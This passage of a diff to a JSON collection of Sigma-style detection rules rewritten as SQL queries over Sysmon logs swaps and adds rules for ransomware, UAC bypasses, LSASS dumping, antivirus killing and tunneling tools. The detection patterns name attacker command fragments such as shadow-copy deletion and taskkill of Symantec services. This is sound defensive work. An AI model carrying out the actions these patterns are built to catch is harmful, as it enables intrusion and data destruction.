globally writable paths.\nAdversaries can take advantage of this and load or influence any script hosts or ANY .NET 
Application \nin Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr\n", - "author": "Sreeman", - "tags": [ - "attack.defense_evasion", - "attack.persistence", "attack.execution", - "attack.t1574.002" + "attack.t1204.002", + "attack.t1047", + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%echo %' ESCAPE '\\' OR CommandLine LIKE '%copy %' ESCAPE '\\' OR CommandLine LIKE '%type %' ESCAPE '\\' OR CommandLine LIKE '%file createnew%' ESCAPE '\\') AND (CommandLine LIKE '% C:\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Windows\\\\SysWow64\\\\Tasks\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\WINWORD.exe' ESCAPE '\\' AND Image LIKE '%.tmp' ESCAPE '\\') OR (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%shadowcopy delete' ESCAPE '\\') OR (CommandLine LIKE '%shadowcopy delete' ESCAPE '\\' AND CommandLine LIKE '%\\\\..\\\\..\\\\system32%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_task_folder_evasion.yml" + "filename": "proc_creation_win_malware_maze_ransomware.yml" }, { - "title": "Sofacy Trojan Loader Activity", - "id": "ba778144-5e3d-40cf-8af9-e28fb1df1e20", - "status": "test", - "description": "Detects Trojan loader activity as used by APT28", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", + "title": "LockerGoga Ransomware Activity", + "id": "74db3488-fd28-480a-95aa-b7af626de068", + "status": "stable", + "description": "Detects LockerGoga ransomware activity via specific command line.", + "author": "Vasiliy Burov, oscd.community", "tags": [ - "attack.g0007", - 
"attack.execution", - "attack.t1059.003", - "attack.defense_evasion", - "car.2013-10-002", - "attack.t1218.011" + "attack.impact", + "attack.t1486" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\%APPDATA\\%\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.dat\",%' ESCAPE '\\' OR (CommandLine LIKE '%.dll\",#1' ESCAPE '\\' OR CommandLine LIKE '%.dll #1' ESCAPE '\\' OR CommandLine LIKE '%.dll\" #1' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-i SM-tgytutrc -s%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_sofacy.yml" + "filename": "proc_creation_win_malware_lockergoga_ransomware.yml" }, { - "title": "Potential Exploitation Attempt Of Undocumented WindowsServer RCE", - "id": "6d5b8176-d87d-4402-8af4-53aee9db7b5d", + "title": "Kavremover Dropped Binary LOLBIN Usage", + "id": "d047726b-c71c-4048-a99b-2e2f50dc107d", "status": "experimental", - "description": "Detects potential exploitation attempt of undocumented Windows Server Pre Auth Remote Code Execution (RCE)", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", + "description": "Detects the execution of a signed binary dropped by Kaspersky Lab Products Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands and binaries.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k DHCPServer%' ESCAPE '\\' AND CommandLine LIKE '%-k DHCPServer%' ESCAPE '\\' AND (User LIKE 
'%NETWORK SERVICE%' ESCAPE '\\' OR User LIKE '%NETZWERKDIENST%' ESCAPE '\\' OR User LIKE '%SERVIZIO DI RETE%' ESCAPE '\\' OR User LIKE '%SERVICIO DE RED%' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_exploit_other_win_server_undocumented_rce.yml" - }, - { - "title": "New ActiveScriptEventConsumer Created Via Wmic.EXE", - "id": "ebef4391-1a81-4761-a40a-1db446c0e625", - "status": "test", - "description": "Detects WMIC executions in which an event consumer gets created. This could be used to establish persistence", - "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1546.003" - ], - "falsepositives": [ - "Legitimate software creating script event consumers" + "attack.defense_evasion", + "attack.t1127" ], - "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%ActiveScriptEventConsumer%' ESCAPE '\\' AND CommandLine LIKE '% CREATE %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '% run run-cmd %' ESCAPE '\\' AND NOT ((ParentImage LIKE '%\\\\kavremover.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cleanapi.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmic_eventconsumer_creation.yml" + "filename": "proc_creation_win_lolbin_kavremover.yml" }, { - "title": "Potential Ke3chang/TidePool Malware Activity", - "id": "7b544661-69fc-419f-9a59-82ccc328f205", - "status": "test", - "description": "Detects registry modifications potentially related to the Ke3chang/TidePool malware as seen in campaigns running in 2019 and 2020", - "author": "Markus Neis, Swisscom", + "title": "Taskkill Symantec Endpoint Protection", + "id": "4a6713f6-3331-11ed-a261-0242ac120002", + "status": "experimental", + "description": "Detects one of the possible scenarios for disabling Symantec Endpoint Protection.\nSymantec Endpoint Protection antivirus software services 
incorrectly implement the protected service mechanism.\nAs a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service.\n", + "author": "Ilya Krestinichev, Florian Roth (Nextron Systems)", "tags": [ - "attack.g0004", "attack.defense_evasion", "attack.t1562.001" ], 
@@ -10299,73 +9981,28 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%-Property DWORD -name DisableFirstRunCustomize -value 2 -Force%' ESCAPE '\\' OR CommandLine LIKE '%-Property String -name Check\\_Associations -value%' ESCAPE '\\' OR CommandLine LIKE '%-Property DWORD -name IEHarden -value 0 -Force%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%taskkill%' ESCAPE '\\' AND CommandLine LIKE '% /F %' ESCAPE '\\' AND CommandLine LIKE '% /IM %' ESCAPE '\\' AND CommandLine LIKE '%ccSvcHst.exe%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_ke3chang_tidepool.yml" + "filename": "proc_creation_win_taskkill_sep.yml" }, { - "title": "Potential NTLM Coercion Via Certutil.EXE", - "id": "6c6d9280-e6d0-4b9d-80ac-254701b64916", + "title": "Potential Unquoted Service Path Reconnaissance Via Wmic.EXE", + "id": "68bcd73b-37ef-49cb-95fc-edc809730be6", "status": "experimental", - "description": "Detects possible NTLM coercion via certutil using the 'syncwithWU' flag", + "description": "Detects known WMI recon method to look for unquoted service paths using wmic. 
Often used by pentester and attacker enumeration scripts", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.execution", + "attack.t1047" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '% -syncwithWU %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_certutil_ntlm_coercion.yml" - }, - { - "title": "HackTool - DInjector PowerShell Cradle Execution", - "id": "d78b5d61-187d-44b6-bf02-93486a80de5a", - "status": "test", - "description": "Detects the use of the Dinject PowerShell cradle based on the specific flags", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.t1055" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% /am51%' ESCAPE '\\' AND CommandLine LIKE '% /password%' ESCAPE '\\')" - ], - "filename": "proc_creation_win_hktl_dinjector.yml" - }, - { - "title": "OilRig APT Activity", - "id": "ce6e34ca-966d-41c9-8d93-5b06c8b97a06", - "status": "test", - "description": "Detects OilRig activity as reported by Nyotron in their March 2018 report", - "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", - "tags": [ - "attack.persistence", - "attack.g0049", - "attack.t1053.005", - "attack.s0111", - "attack.t1543.003", - "attack.defense_evasion", - "attack.t1112", - "attack.command_and_control", - "attack.t1071.004" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%SC Scheduled Scan%' ESCAPE '\\' AND CommandLine LIKE '%\\\\microsoft\\\\Taskbar\\\\autoit3.exe%' ESCAPE '\\') OR (Image LIKE '%\\\\Windows\\\\Temp\\\\DB\\\\%' ESCAPE '\\' AND Image LIKE '%.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\Service.exe' ESCAPE '\\' AND (CommandLine LIKE '%i%' ESCAPE '\\' OR CommandLine LIKE '%u%' ESCAPE '\\')) OR (ParentImage LIKE '%\\\\local\\\\microsoft\\\\Taskbar\\\\autoit3.exe' ESCAPE '\\' AND CommandLine LIKE '%nslookup.exe%' ESCAPE '\\' AND CommandLine LIKE '%-q=TXT%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'wmic.exe' OR Image LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND (CommandLine LIKE '% service get %' ESCAPE '\\' AND CommandLine LIKE '%name,displayname,pathname,startmode%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_oilrig_mar18.yml" + "filename": "proc_creation_win_wmic_recon_unquoted_service_search.yml" }, { "title": "Potential SMB Relay Attack Tool Execution", @@ -10386,26 +10023,6 @@ ], "filename": "proc_creation_win_hktl_relay_attacks_tools.yml" }, - { - "title": "UAC Bypass WSReset", - "id": "89a9a0e0-f61a-42e5-8957-b1479565a658", - "status": "test", - "description": "Detects the pattern of UAC Bypass via WSReset usable by default sysmon-config", - "author": "Christian Burkard (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wsreset.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" - ], - "filename": "proc_creation_win_uac_bypass_wsreset_integrity_level.yml" - }, { "title": "HackTool - winPEAS Execution", "id": "98b53e78-ebaf-46f8-be06-421aafd176d9", 
@@ -10428,43 +10045,63 @@ "filename": "proc_creation_win_hktl_winpeas.yml" }, { - "title": "Delete All Scheduled Tasks", - "id": "220457c1-1c9f-4c2e-afe6-9598926222c1", + "title": "Exploiting CVE-2019-1388", + "id": "02e0b2ea-a597-428e-b04a-af6a1a403e5c", + "status": "stable", + "description": "Detects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.privilege_escalation", + "attack.t1068" + ], + "falsepositives": [ + "Unknown" + ], + "level": "critical", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\consent.exe' ESCAPE '\\' AND Image LIKE '%\\\\iexplore.exe' ESCAPE '\\' AND CommandLine LIKE '% http%' ESCAPE '\\') AND (IntegrityLevel = 'System' OR (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_exploit_cve_2019_1388.yml" + }, + { + "title": "HackTool - KrbRelay Execution", + "id": "e96253b8-6b3b-4f90-9e59-3b24b99cf9b4", "status": "experimental", - "description": "Detects the usage of schtasks with the delete flag and the asterisk symbole to delete all tasks from the schedule of the local computer, including tasks scheduled by other users.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the use of KrbRelay, a Kerberos relaying tool", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1489" + "attack.credential_access", + "attack.t1558.003" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /delete %' ESCAPE '\\' AND CommandLine LIKE '%/tn \\*' ESCAPE '\\' AND CommandLine LIKE '% /f%' ESCAPE '\\')" + "SELECT * FROM 
logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\KrbRelay.exe' ESCAPE '\\' OR OriginalFileName = 'KrbRelay.exe') OR (CommandLine LIKE '% -spn %' ESCAPE '\\' AND CommandLine LIKE '% -clsid %' ESCAPE '\\' AND CommandLine LIKE '% -rbcd %' ESCAPE '\\') OR (CommandLine LIKE '%shadowcred%' ESCAPE '\\' AND CommandLine LIKE '%clsid%' ESCAPE '\\' AND CommandLine LIKE '%spn%' ESCAPE '\\') OR (CommandLine LIKE '%spn %' ESCAPE '\\' AND CommandLine LIKE '%session %' ESCAPE '\\' AND CommandLine LIKE '%clsid %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_schtasks_delete_all.yml" + "filename": "proc_creation_win_hktl_krbrelay.yml" }, { - "title": "Hermetic Wiper TG Process Patterns", - "id": "2f974656-6d83-4059-bbdf-68ac5403422f", + "title": "Suspicious Binary In User Directory Spawned From Office Application", + "id": "aa3a6f94-890e-4e22-b634-ffdfd54792cc", "status": "experimental", - "description": "Detects process execution patterns found in intrusions related to the Hermetic Wiper malware attacks against Ukraine in February 2022", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects an executable in the users directory started from one of the Microsoft Office suite applications (Word, Excel, PowerPoint, Publisher, Visio)", + "author": "Jason Lynch", "tags": [ "attack.execution", - "attack.lateral_movement", - "attack.t1021.001" + "attack.t1204.002", + "attack.g0046", + "car.2013-05-002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\policydefinitions\\\\postgresql.exe' ESCAPE '\\' OR (CommandLine LIKE '%CSIDL\\_SYSTEM\\_DRIVE\\\\temp\\\\sys.tmp%' ESCAPE '\\' OR CommandLine LIKE '% 1> \\\\\\\\127.0.0.1\\\\ADMIN$\\\\\\_\\_16%' ESCAPE '\\') OR (CommandLine LIKE '%powershell -c %' ESCAPE '\\' AND CommandLine LIKE '%\\\\comsvcs.dll MiniDump %' ESCAPE '\\' AND 
CommandLine LIKE '%\\\\winupd.log full%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSACCESS.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\EQNEDT32.exe' ESCAPE '\\') AND Image LIKE 'C:\\\\users\\\\%' ESCAPE '\\' AND Image LIKE '%.exe' ESCAPE '\\') AND NOT (Image LIKE '%\\\\Teams.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_hermetic_wiper_activity.yml" + "filename": "proc_creation_win_office_spawn_exe_from_users_directory.yml" }, { "title": "Fireball Archer Install", 
@@ -10487,241 +10124,222 @@ "filename": "proc_creation_win_malware_fireball.yml" }, { - "title": "Exploited CVE-2020-10189 Zoho ManageEngine", - "id": "846b866e-2a57-46ee-8e16-85fa92759be7", - "status": "test", - "description": "Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189", - "author": "Florian Roth (Nextron Systems)", + "title": "Abused Debug Privilege by Arbitrary Parent Processes", + "id": "d522eca2-2973-4391-a3e0-ef0374321dae", + "status": "test", + "description": "Detection of unusual child processes by different system processes", + "author": "Semanur Guneysu @semanurtg, oscd.community", "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.execution", - "attack.t1059.001", - "attack.t1059.003", - "attack.s0190", - "cve.2020.10189" + "attack.privilege_escalation", + "attack.t1548" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%DesktopCentral\\_Server\\\\jre\\\\bin\\\\java.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\lsass.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\smss.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wininit.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR 
ParentImage LIKE '%\\\\searchindexer.exe' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'Cmd.Exe'))) AND NOT (CommandLine LIKE '% route %' ESCAPE '\\' AND CommandLine LIKE '% ADD %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2020_10189.yml" + "filename": "proc_creation_win_susp_abusing_debug_privilege.yml" }, { - "title": "Potential LSASS Process Dump Via Procdump", - "id": "5afee48e-67dd-4e03-a783-f74259dcf998", + "title": "Winnti Pipemon Characteristics", + "id": "73d70463-75c9-4258-92c6-17500fe972f2", "status": "stable", - "description": "Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. This way we're also able to catch cases in which the attacker has renamed the procdump executable.", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects specific process characteristics of Winnti Pipemon malware reported by ESET", + "author": "Florian Roth (Nextron Systems), oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1036", - "attack.credential_access", - "attack.t1003.001", - "car.2013-05-009" + "attack.t1574.002", + "attack.g0044" ], "falsepositives": [ - "Unlikely, because no one should dump an lsass process memory", - "Another tool that uses the command line switches of Procdump" + "Legitimate setups that use similar flags" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '% /ma %' ESCAPE '\\') AND CommandLine LIKE '% ls%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%setup0.exe -p%' ESCAPE '\\' OR (CommandLine LIKE '%setup.exe%' ESCAPE '\\' AND (CommandLine LIKE '%-x:0' ESCAPE '\\' OR CommandLine LIKE '%-x:1' ESCAPE '\\' OR CommandLine LIKE '%-x:2' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_sysinternals_procdump_lsass.yml" + "filename": "proc_creation_win_apt_winnti_pipemon.yml" }, { - "title": "Execution via Diskshadow.exe", - "id": "0c2f8629-7129-4a8a-9897-7e0768f13ff2", - "status": "test", - "description": "Detects using Diskshadow.exe to execute arbitrary code in text file", - "author": "Ivan Dyachkov, oscd.community", + "title": "PUA - Chisel Tunneling Tool Execution", + "id": "8b0e12da-d3c3-49db-bb4f-256703f380e5", + "status": "experimental", + "description": "Detects usage of the Chisel tunneling tool via the commandline arguments", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1218" + "attack.command_and_control", + "attack.t1090.001" ], "falsepositives": [ - "False postitve can be if administrators use diskshadow tool in their infrastructure as a main backup tool with scripts." 
+ "Some false positives may occur with other tools with similar commandlines" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\diskshadow.exe' ESCAPE '\\' AND (CommandLine LIKE '%/s%' ESCAPE '\\' OR CommandLine LIKE '%-s%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\chisel.exe' ESCAPE '\\' OR ((CommandLine LIKE '%exe client %' ESCAPE '\\' OR CommandLine LIKE '%exe server %' ESCAPE '\\') AND (CommandLine LIKE '%-socks5%' ESCAPE '\\' OR CommandLine LIKE '%-reverse%' ESCAPE '\\' OR CommandLine LIKE '% r:%' ESCAPE '\\' OR CommandLine LIKE '%:127.0.0.1:%' ESCAPE '\\' OR CommandLine LIKE '%-tls-skip-verify %' ESCAPE '\\' OR CommandLine LIKE '%:socks%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_lolbin_diskshadow.yml" + "filename": "proc_creation_win_pua_chisel.yml" }, { - "title": "ZOHO Dctask64 Process Injection", - "id": "6345b048-8441-43a7-9bed-541133633d7a", - "status": "test", - "description": "Detects suspicious process injection using ZOHO's dctask64.exe", + "title": "Cmd.EXE Missing Space Characters Execution Anomaly", + "id": "a16980c2-0c56-4de0-9a79-17971979efdd", + "status": "experimental", + "description": "Detects Windows command lines that miss a space before or after the /c flag when running a command using the cmd.exe.\nThis could be a sign of obfuscation of a fat finger problem (typo by the developer).\n", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1055.001" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\dctask64.exe' ESCAPE '\\' AND NOT (CommandLine LIKE '%DesktopCentral\\_Agent\\\\agent%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE 
((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%cmd.exe/c%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/c%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/k%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/k%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/r%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/r%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/r%' ESCAPE '\\') OR (CommandLine LIKE '%/cwhoami%' ESCAPE '\\' OR CommandLine LIKE '%/cpowershell%' ESCAPE '\\' OR CommandLine LIKE '%/cschtasks%' ESCAPE '\\' OR CommandLine LIKE '%/cbitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%/ccertutil%' ESCAPE '\\' OR CommandLine LIKE '%/kwhoami%' ESCAPE '\\' OR CommandLine LIKE '%/kpowershell%' ESCAPE '\\' OR CommandLine LIKE '%/kschtasks%' ESCAPE '\\' OR CommandLine LIKE '%/kbitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%/kcertutil%' ESCAPE '\\') OR (CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\')) OR (CommandLine LIKE '%AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\resources\\\\app\\\\node\\_modules%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/c .' 
ESCAPE '\\' OR CommandLine = 'cmd.exe /c')))" ], - "filename": "proc_creation_win_lolbin_dctask64_proc_inject.yml" + "filename": "proc_creation_win_cmd_no_space_execution.yml" }, { - "title": "UAC Bypass Using ChangePK and SLUI", - "id": "503d581c-7df0-4bbe-b9be-5840c0ecc1fc", + "title": "Bypass UAC via Fodhelper.exe", + "id": "7f741dcf-fc22-4759-87b4-9ae8376676a2", "status": "test", - "description": "Detects an UAC bypass that uses changepk.exe and slui.exe (UACMe 61)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes.", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", "tags": [ - "attack.defense_evasion", "attack.privilege_escalation", "attack.t1548.002" ], "falsepositives": [ - "Unknown" + "Legitimate use of fodhelper.exe utility by legitimate user" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\changepk.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\slui.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\fodhelper.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_uac_bypass_changepk_slui.yml" + "filename": "proc_creation_win_uac_bypass_fodhelper.yml" }, { - "title": "Potential Emotet Activity", - "id": "d02e8cf5-6099-48cf-9bfc-1eec2d0c7b18", - "status": "stable", - "description": "Detects all Emotet like process executions that are not covered by the more generic rules", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Raspberry Robin Dot Ending File", + "id": "a35c97c8-d9c4-4c89-a3e7-533dc0bcb73a", + "status": "experimental", + "description": "Detects commandline containing reference to files ending with a \".\" This 
